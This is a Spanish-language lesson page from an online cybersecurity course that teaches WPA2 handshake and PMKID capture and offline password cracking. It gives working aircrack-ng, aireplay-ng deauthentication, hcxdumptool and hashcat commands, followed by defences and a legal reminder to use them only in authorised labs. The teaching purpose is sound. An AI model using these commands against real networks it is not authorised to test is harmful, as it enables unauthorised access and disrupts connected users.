Captura y cracking del handshake de WPA2
Capture un handshake de 4 vías con aircrack-ng e intente ataques de diccionario con Hashcat.
Captura y cracking del handshake de WPA2 es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 2 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.
El handshake de 4 vías
Cuando un cliente se conecta a una red WPA2, el handshake de 4 vías deriva la Pairwise Transient Key (PTK) a partir de la PMK (derivada de la PSK) y de nonces aleatorios. Capturar este handshake permite realizar cracking de contraseñas sin conexión.
Configuración del modo monitor
El modo monitor permite que la tarjeta inalámbrica capture todas las tramas, independientemente de su destino; es necesario para capturar handshakes de forma pasiva. Solo funciona con tarjetas compatibles con el modo monitor.
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check killCaptura pasiva del handshake
Airodump-ng captura tramas de forma pasiva. Espere a que un cliente se conecte de manera natural o fuerce la reconexión mediante desautenticación. La captura del handshake aparece en la esquina superior derecha de la salida de airodump.
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...Ataque de desautenticación
El envío de tramas de desautenticación falsificadas obliga a los clientes conectados a desconectarse y volver a conectarse, lo que activa una nueva captura del handshake. Es una técnica ruidosa y detectable, y requiere que el cliente esté dentro del alcance.
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)Ataque PMKID: no requiere un cliente
El ataque PMKID (hcxdumptool) captura el PMKID de las tramas beacon/probe sin necesidad de un cliente conectado. Se obtiene más rápido y se puede crackear con la misma facilidad que un handshake completo.
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtCracking del handshake con Hashcat
Convierta el archivo de captura y ataque con Hashcat utilizando el modo 22000 (formato unificado de WPA2) o el modo 2500 (formato heredado). Utilice rockyou.txt junto con reglas para obtener los mejores resultados.
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dCracking con Aircrack-ng
Aircrack-ng realiza cracking de WPA2 basado en CPU directamente desde el archivo de captura. Es más lento que el cracking con GPU de Hashcat, pero no requiere convertir el formato.
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capEstrategia de wordlists
El éxito del cracking de contraseñas WPA2 depende por completo de la calidad de la wordlist. Utilice: rockyou.txt como base, conjuntos de reglas de hashcat para generar mutaciones, wordlists específicas de la empresa (nombre+año+símbolo) y listas dirigidas obtenidas mediante OSINT.
La realidad del tiempo de cracking
Una contraseña WPA2 aleatoria de 20 caracteres o más es computacionalmente inviable de crackear. El cracking solo resulta práctico contra contraseñas cortas o basadas en diccionarios. Por eso, la longitud y la aleatoriedad de la contraseña importan más que las reglas de complejidad.
Defensas
Utilice WPA3-SAE (inmune a los ataques de diccionario sin conexión), o WPA2 con una frase de contraseña aleatoria de 20 caracteres o más, y WPA2-Enterprise con EAP-TLS (certificados en lugar de contraseñas).
Recordatorio legal
Capturar handshakes de WPA2 en redes que no son de su propiedad es ilegal. Todas las técnicas descritas aquí se aplican únicamente a sus propias redes de prueba o a entornos de laboratorio autorizados (por ejemplo, un laboratorio doméstico o un AP de pruebas dedicado).
Comprobación rápida
¿Qué mejora aporta el ataque PMKID frente a la captura estándar de un handshake?
Resumen: cracking de WPA2
Capturar un handshake de WPA2 (o un PMKID) convierte el cracking de Wi-Fi en un ataque de diccionario sin conexión. El éxito depende por completo de la solidez de la contraseña: las contraseñas cortas y basadas en diccionarios caen rápidamente, mientras que las largas y aleatorias son prácticamente imposibles de crackear. Protéjase utilizando WPA3-SAE, frases de contraseña robustas y WPA2-Enterprise en redes corporativas.
Aprende Cyber Security Academy con un tutor de IA — gratis
Escribe y ejecuta código real en tu navegador, obtén ayuda instantánea de un tutor de IA disponible 24/7 y continúa donde lo dejaste en la web o en la aplicación.
- Cursos
- 76
- Lecciones
- 303
Preguntas frecuentes
¿La lección «Captura y cracking del handshake de WPA2» es gratis?
Sí — el texto completo de «Captura y cracking del handshake de WPA2» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Captura y cracking del handshake de WPA2»?
Capture un handshake de 4 vías con aircrack-ng e intente ataques de diccionario con Hashcat. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Cyber Security Academy?
No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 2 de 4.
¿Cuánto tiempo toma la lección «Captura y cracking del handshake de WPA2»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?
Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Protocolos de seguridad 802.11: WEP, WPA2 y WPA3
- Captura y cracking del handshake de WPA2
- Ataques Evil Twin y de portal cautivo
- Wi-Fi empresarial: EAP y RADIUS